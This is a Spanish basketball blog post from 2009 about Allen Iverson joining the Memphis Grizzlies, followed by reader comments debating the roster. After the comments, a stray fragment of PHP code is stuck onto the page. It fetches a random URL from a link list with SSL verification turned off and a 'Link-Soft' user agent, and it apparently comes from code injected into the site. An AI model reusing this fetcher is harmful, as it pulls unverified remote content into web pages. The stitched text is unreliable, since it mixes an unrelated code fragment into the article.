Iverson jugará en los Grizzlies

11 de September de 2009 por txusma

Como se venía rumoreando desde hace días, finalmente The Answer ha decidido, a sus 34 años, jugar en los Memphis Grizzlies conviertiéndose de esta manera en el jugador más mediático que viste la camiseta de los ositos. Será por un solo año y a cambio de 3.5 millones de dólares más una serie de incentivos.

Seguramente dentro de un mes alguien analizará en TJNBA.com la plantilla de los Memphis Grizzlies de cara a la temporada que comienza pero no se puede negar que tendrá mucho trabajo. Iverson llega, teóricamente para salir desde el banquillo y dar descanso a Michael Conley y OJ Mayo. ¿Alguien se lo cree? Además tendrá que compartir balones con Rudy Gay y Zach Randolph, dos jugadores que no son famosos precisamente por su generosidad y visión de juego. ¿Qué cesto se puede construir con estos mimbres?. Los Grizzlies tienen por un lado un nucleo de jugadores jóvenes no exentos de calidad y por el otro a 2 veteranos de vuelta de todo. Seguiré sin dar ni un duro por ver un partido de Memphis, pero reconozco que me ha picado la curiosidad y pondré un ojo encima en la evolución de este equipo.

El acuerdo Iverson-Grizzlies ha sido la noticia más destacada de los últimos días pero no la única:

– Los Wolves se han hecho con los servicios de Antonio Daniels a cambio de Darius Songaila y Bobby Brown. En el traspaso también han conseguido una segunda ronda.
Rodney Carney volverá a Philadelphia donde cobrará el mínimo durante una temporada.
CJ Watson renueva con los Warriors por un solo año con la esperanza de realizar un gran temporada y optar a un mejor contrato el verano siguiente.
Juan Carlos Navarro se ha convertido en agente libre sin restricciones al no ejercer los Grizzlies la Qualifying Offer.

Comenta

7 comentarios a esta entrada

  1. sergio dice:
    #1

    por calidad individual creo q puede ser claramente equipo de playoffs… pero como no venga un entrenador de mucho caracter y centrado en defensa y correr (que no va a venir….) esto va a parecer 1 partido en el Rucker Park

      Citar

  2. Minikisto dice:
    #2

    Estos señores de Tennessee tienen un equipazo, pero creo que solo si juegan run & gun, me gustaría ver a D’Antoni entrenando estos grizzlies porque A, van a acabar los partidos con 120 puntos de media y B, Marc acabaría con unos 20 rebotes por noche xD… No se pero creo que no va a funcionar este experimento aunque claro por extraño que parece hacía muchos años que no tenían tantas opciones de entrar en playoff… a ver lo que pasa…

      Citar

  3. Dantley2 dice:
    #3

    Más bien Marc Gasol va a acabar con serios problemas de cuello. No las va a ver como no sea en los rebotes que coja.

    Desde el punto de vista empresarial es una magnífica operación.

      Citar

  4. kantonyo dice:
    #4

    A simple vista :

    C – Marc Gasol – Thabet
    PF – Zach Randolph – Arthur
    SF – Rudy Gay – Sam Young
    SG – OJ Mayo – (Allen Iverson)
    PG – Allen Iverson – Mike Conley

    Es una plantilla bastante compensada y con grandisimo talento, la plantilla perfecta para jugar al 2k10. En cambio en la vida real es un equipo que me genera muchísimas dudas, va a ser un polvorín. Marc Gasol parece que ha decidido ser como ellos y poner su granito de “polvora”, viendo sus declaraciones sobre Scariolo (aunque tenga toda la razón…)

      Citar

  5. Dantley2 dice:
    #5

    Es demoledor ese quinteto que has puesto Kantonyo. Creo que por primera vez en su vida, Iverson tendrá a tres tipos más egoístas en el mismo quinteto. Brutal. Eso sí, yo dueño de Memphis, lo habría fichado igual, asegura que haya expectación, espectáculo y sólo tiene un año con lo cual si el polvorín explota, se reconstruye.

      Citar

  6. Txusma dice:
    #6

    Os imagináis por un momento q a los Grizzlies les va bien este año??

      Citar

  7. L.Casei dice:
    #7

    Yo lo decía en otra entrada, creo que es difícil que les salga bien la jugada, es una apuesta muy arriesgada, aunque lo bueno es que hay poco que perder y tienen que llevar a más gente al FedEx.
    Defensivamente parecen no muy fuertes y en ataque, hará falta definir roles porque si no, puede ser una feria. Yo creo que iverson sí va a tener buena actitud, aunque nunca se sabe con este crack.
    No tienen especialistas de tiro, y eso con el estilo que quieren imponer será un lastre, porque les dará menos opciones. Por supuesto que Mayo es un gran tirador, pero me refiero a especialistas o variedad en ataque.
    Pero es un equipo que hay que ver, como deciais.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>